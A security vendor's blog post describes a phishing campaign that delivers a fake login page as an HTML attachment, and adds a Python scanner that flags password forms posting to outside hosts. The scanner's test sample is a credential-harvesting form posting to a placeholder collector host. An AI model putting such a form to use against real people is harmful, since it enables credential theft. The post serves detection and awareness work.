A crafty scammer is currently running a phishing campaign which delivers a fake landing page within an HTML attachment instead of redirecting you to an external site.
Traditionally, a phishing email designed to steal user credentials contains a link which the victim is encouraged to click on, usually stating that something bad will happen if the link is ignored.
Once clicked, the link redirects them to a web site with a login form which subtly saves the entered details to a database or in some cases sends them directly to the hacker.
For the educated eye, these techniques are usually quite simple to spot: grammatical mistakes or links to suspicious, non-official websites are easy clues that you may be dealing with a malicious email. In an attempt to reduce user suspicion, the hacker in this case brings the landing page straight to you, without the need to follow any odd-looking redirects.
When executed by the user opening the HTML file, the code creates a clean-looking login form with the ability to “select your email provider” from a long drop-down list.
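A mail gateway or analyst can catch this pattern without opening the attachment in a browser: an HTML attachment that contains a password field, a long provider drop-down and a form that posts to an outside host is almost never legitimate. The following scanner is an added example written for this post, not Phishing Tackle's tooling; the sample attachment and the collector hostname are constructed for illustration.

```python
"""Heuristic check for HTML e-mail attachments that embed a local login form."""
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collects, per <form>, whether it has a password field, how many
    <option> entries it offers and where its action attribute points."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self._current: dict = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False, "options": 0}
            self.forms.append(self._current)
        elif self._current:
            if tag == "input" and (a.get("type") or "").lower() == "password":
                self._current["password"] = True
            elif tag == "option":
                self._current["options"] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = {}


def scan_html_attachment(html: str) -> List[str]:
    """Return human-readable findings; an empty list means no credential form was seen."""
    parser = _FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue  # a form without a password field is not a credential harvester
        findings.append("attachment contains a login form with a password field")
        host = urlparse(form["action"]).netloc
        if host:  # local HTML file posting credentials to a remote host
            findings.append(f"login form posts credentials to external host {host}")
        if form["options"] >= 5:  # the 'select your email provider' drop-down
            findings.append(f"login form offers a {form['options']}-entry provider drop-down")
    return findings


# Constructed sample mimicking the campaign; the hostname is a placeholder.
SAMPLE_ATTACHMENT = """<html><body>
<form action="https://collector.example.invalid/login.php" method="post">
  <select name="provider"><option>Gmail</option><option>Outlook</option>
  <option>Yahoo</option><option>AOL</option><option>iCloud</option><option>Other</option></select>
  <input type="email" name="user"><input type="password" name="pass">
  <input type="submit" value="Sign in"></form></body></html>"""
```

Run over every text/html attachment at the gateway; any non-empty result is worth quarantining for review.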
The locally-generated phishing form
A somewhat lazy final page
The rapid increase in hackers’ ingenuity further demonstrates a serious need for user education. Without Security Awareness Training, this campaign and many like it prove very successful for the social engineers creating them.
At Phishing Tackle, we work diligently to educate our readers and customers on the dangers of these new and improving campaigns.
We even went as far as to create a tool which shows you how many of your users would fall for a simple phishing attack, information which is invaluable to decision makers when apportioning cyber security budgets. Have a look for yourself and see how many of your users are Click-Prone®.
Don’t procrastinate, educate.